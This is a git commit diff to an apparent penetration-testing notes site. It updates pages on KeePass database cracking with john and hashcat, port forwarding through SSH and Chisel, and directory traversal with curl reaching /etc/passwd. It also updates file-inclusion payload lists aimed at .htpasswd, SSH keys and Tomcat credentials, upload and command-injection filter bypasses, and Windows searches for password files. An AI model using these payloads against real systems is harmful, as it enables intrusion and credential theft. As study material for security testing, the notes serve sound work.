updated

hdks-bug · hdks-bug · commit 32fa1a42d62b · 2024-10-25T12:00:23.000+09:00
diff --git a/src/exploit/cryptography/algorithm/kdbx-files.md b/src/exploit/cryptography/algorithm/kdbx-files.md
@@ -4,7 +4,7 @@ description: A KDBX file is a password database created by KeePass Password Safe
 tags:
     - Cryptography
 refs:
-date: 2023-09-01
+date: 2024-10-25
 draft: false
 ---
 
@@ -36,7 +36,16 @@ Right-click on the password value then click **Copy Password**.
 
 When opening KDBX file in KeePass if you’re asked the Master Key, you need to crack the password of the KDBX file. **John The Ripper** can be used to crack the password.
 
-```bash
+### 1. Convert to Hash
+
+```sh
 keepass2john example.kdbx > hash.txt
+```
+
+### 2. Crack the Hash
+
+```sh
 john --wordlist=wordlist.txt hash.txt
+# or
+hashcat -m 13400 -a 0 hash.txt wordlist.txt
 ```
diff --git a/src/exploit/linux/privilege-escalation/index.md b/src/exploit/linux/privilege-escalation/index.md
@@ -6,7 +6,7 @@ tags:
     - Remote Code Execution
 refs:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation
-date: 2024-10-03
+date: 2024-10-25
 draft: false
 ---
 
@@ -35,10 +35,12 @@ uname -o
 uname -m
 
 # OS kernel version
-cat /proc/version
+cat /etc/os-release
 cat /etc/*release
+cat /proc/version
 
 # LSB (Linux Standard Base) and distribution information
+cat /etc/lsb-release
 lsb_release -a
 ```
 
@@ -396,36 +398,33 @@ ss -lntu
 ss -nptu
 ```
 
-### Access open ports that cannot be accessed from outside
+### Access Internal Services From Outside
 
-If we discover a listen port that cannot be accessed externally as below, we can access this port by port forwarding.
+If we discover a listenning port that cannot be accessed externally as below, we can access the port by port forwarding or reverse port forwarding.
 
 ```txt
 tcp  0  0  127.0.0.1:8080  0.0.0.0:*  LISTEN  -                   
 ```
 
 There are various methods to do that.
 
-- **Method 1. Using Socat**
+- **Option 1. Port Forwarding with SSH**
 
-    In remote machine,  download the socat and run it.
+    If we have the SSH credential, we can easily port forward as below in our local machine:
 
     ```sh
-    # we need to download the socat binary file from local machine
-    wget http://<local-ip>:<local-port>/socat
-    chmod +x socat
-    socat tcp-listen:8090,fork,reuseaddr tcp:localhost:8080
+    ssh -L 8080:127.0.0.1:8080 user@<target-ip>
     ```
 
-- **Method 2. Using SSH Tunnel (SSH credential required)**
+    See for details: [Local Port Forwarding with SSH](/exploit/network/port-forwarding/port-forwarding-with-ssh/#local-port-forwarding)
 
-    In local machine, run the ‘ssh -L’.
+- **Option 2. Reverse Port Forwarding with Chisel**
+
+    If we don't have the SSH credential, we can reverse port forward using Chisel.  
+    See for details: [Reverse Port Forwarding with Chisel](/exploit/network/port-forwarding/port-forwarding-with-chisel/#reverse-port-forwarding)
 
-    ```sh
-    ssh -L 8090:localhost:8080 remote-user@<remote-ip>
-    ```
 
-Now we can access to **http://\<remote-ip\>:8090/** in local machine and actually can get the content of **http://\<remote-ip\>:8080/**.
+Now we can access to `http://localhost:8080` in local browser. That means we now connected to `http://127.0.0.1:8080` of remote machine.
 
 <br />
 
diff --git a/src/exploit/network/tool/tshark-cheat-sheet.md b/src/exploit/network/tool/tshark-cheat-sheet.md
@@ -4,7 +4,7 @@ description: Tshark is a terminal-oriented version of Wireshark. It's a network
 tags:
     - Network
 refs:
-date: 2024-08-20
+date: 2024-10-25
 draft: false
 ---
 
@@ -61,3 +61,9 @@ tshark -Y 'ip.dst == 127.0.0.1'
 ```
 
 <br />
+
+## Dump Transferred Data
+
+```bash
+tshark -r example.pcapng -T fields -e data -Y "ip.src == 10.0.0.2 and ip.dst == 10.0.0.3" > data.txt
+```
diff --git a/src/exploit/web/security-risk/directory-traversal.md b/src/exploit/web/security-risk/directory-traversal.md
@@ -6,7 +6,7 @@ tags:
 refs:
     - https://www.exploit-db.com/exploits/50383
     - https://www.exploit-db.com/exploits/50406
-date: 2023-03-11
+date: 2024-10-25
 draft: false
 ---
 
@@ -51,6 +51,14 @@ draft: false
 /?file=..\..\..\windows\win.ini
 ```
 
+### Using Curl
+
+If we want to test against the URL path not param, `curl` can be used with the option `--path-as-is`:
+
+```bash
+curl --path-as-is http://example.com/../../../../etc/passwd
+```
+
 <br />
 
 ## Apache 2.4.49 (CVE-2021-41773)
diff --git a/src/exploit/web/security-risk/file-inclusion.md b/src/exploit/web/security-risk/file-inclusion.md
@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
-date: 2024-06-15
+date: 2024-10-25
 draft: false
 ---
 
@@ -111,6 +111,10 @@ When our payload is successful, we can additionaly investigate local files and r
 ?pgae=/root/.profile
 ?page=/root/.ssh/id_rsa
 
+# OS
+?page=/etc/lsb-release
+?page=/etc/os-release
+
 # Processes
 ?page=/proc/net/tcp
 ?page=/proc/self/cmdline
@@ -127,6 +131,7 @@ When our payload is successful, we can additionaly investigate local files and r
 
 # Host
 ?page=/etc/hosts
+?page=/etc/hostname
 # Cron
 ?page=/etc/crontab
 
@@ -141,21 +146,29 @@ When our payload is successful, we can additionaly investigate local files and r
 ?page=/var/www/wordpress/index.php
 
 # Apache
+?page=/etc/apache2/.htpasswd
+?page=/etc/apache2/apache2.conf
+?page=/etc/apache2/envvars
+?page=/etc/apache2/ports.conf
+?page=/etc/apache2/sites-available/domain.conf
+?page=/etc/apache2/sites-available/example.com.conf
+?page=/etc/apache2/sites-available/sub.example.com.conf
+?page=/etc/apache2/sites-available/sub.conf
 ?page=/etc/apache2/sites-enabled/000-default.conf
 ?page=/etc/apache2/sites-enabled/domain.conf
 ?page=/etc/apache2/sites-enabled/example.com.conf
 ?page=/etc/apache2/sites-enabled/sub.example.com.conf
 ?page=/etc/apache2/sites-enabled/sub.conf
-?page=/etc/apache2/sites-available/domain.conf
-?page=/etc/apache2/sites-available/example.com.conf
-?page=/etc/apache2/sites-available/sub.example.com.conf
-?page=/etc/apache2/sites-available/sub.conf
-?page=/etc/apache2/.htpasswd
 ?page=/var/log/apache/access.log
 ?page=/var/log/apache/error.log
 ?page=/var/log/apache2/access.log
 ?page=/var/log/apache2/error.log
 
+# Apache Tomcat
+?page=/opt/tomcat/conf/tomcat-users.xml
+?page=/opt/tomcat/logs/catalina.err
+?page=/opt/tomcat/logs/catalina.out
+
 # Nginx
 ?page=/var/log/nginx/access.log
 ?page=/var/log/nginx/error.log
@@ -214,6 +227,14 @@ When our payload is successful, we can additionaly investigate local files and r
 ?page=C:/xampp/phpMyAdmin/config.inc.php
 ```
 
+### Using Curl
+
+If we want to test against the URL path not param, `curl` can be used with the option `--path-as-is`:
+
+```bash
+curl --path-as-is http://example.com/../../../../etc/passwd
+```
+
 ### Read Process Commands
 
 We can retrieve commands that start processes by enumerating **`/proc/PID/cmdline`**.    
diff --git a/src/exploit/web/security-risk/file-upload-attack.md b/src/exploit/web/security-risk/file-upload-attack.md
@@ -6,7 +6,7 @@ tags:
 refs:
     - https://docstore.mik.ua/orelly/web2/wdesign/ch19_01.htm
     - https://saadahmedx.medium.com/exploiting-auto-save-functionality-to-steal-login-credentials-bf4c7e1594da
-date: 2024-05-29
+date: 2024-10-25
 draft: false
 ---
 
@@ -122,6 +122,17 @@ Content-Type: application/x-php
 ------abcdefghijk
 ```
 
+Do not forget to test bypass techniques as below:
+
+```sh
+# URL encoding
+%2E%2E%2Fexploit.php
+
+# URL double-encoding
+%252E%252E%252Fexploit.php
+..%252Fexploit.php
+```
+
 <br />
 
 ## Overwrite Server Configuration
diff --git a/src/exploit/web/security-risk/os-command-injection.md b/src/exploit/web/security-risk/os-command-injection.md
@@ -6,7 +6,7 @@ tags:
     - Reverse Shell
     - Web
 refs:
-date: 2024-10-03
+date: 2024-10-25
 draft: false
 ---
 
@@ -66,6 +66,8 @@ We may be able to bypass specific character filter by encoding them.
 /?cmd=ls%0Aid
 # %250A: newline (double encoding)
 /?cmd=ls%250Aid
+# Adding at the end.
+/?cmd=ls%0Aid%0A
 
 # %26: &
 /?cmd=ls%26id
@@ -117,8 +119,7 @@ To confirm the result, start tcpdump in our local machine.
 sudo tcpdump -i eth0 icmp
 ```
 
-Then execute ping command in POST request.
-
+Then execute ping command in POST request.  
 Below are examples for POST data.
 
 ```bash
@@ -152,7 +153,7 @@ vim shell.php
 
 ## Blind Command Injection (Time Delay)
 
-Use **"ping"** command to check if the website will be loaded with time delay.
+Use `ping` command to check if the website will be loaded with time delay.
 
 ```txt
 name=michael&email=michael@example.com||ping+-c+10+127.0.0.1||&message=hello
diff --git a/src/exploit/windows/privilege-escalation/index.md b/src/exploit/windows/privilege-escalation/index.md
@@ -8,7 +8,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
     - https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
-date: 2024-10-13
+date: 2024-10-25
 draft: false
 ---
 
@@ -281,6 +281,10 @@ findstr /si cred c:\Users\Administrator\*.txt
 findstr /spin "password" *.*
 findstr /spin "password" c:\Users\Administrator\*
 
+cmd /c dir /s/b C:\*password*
+cmd /c dir /s/b C:\*cred*
+cmd /c dir /s/b C:\*.txt
+
 # List files
 # /a: Displays only the names of those directories and files.
 dir /a \Users\Administrator\Desktop
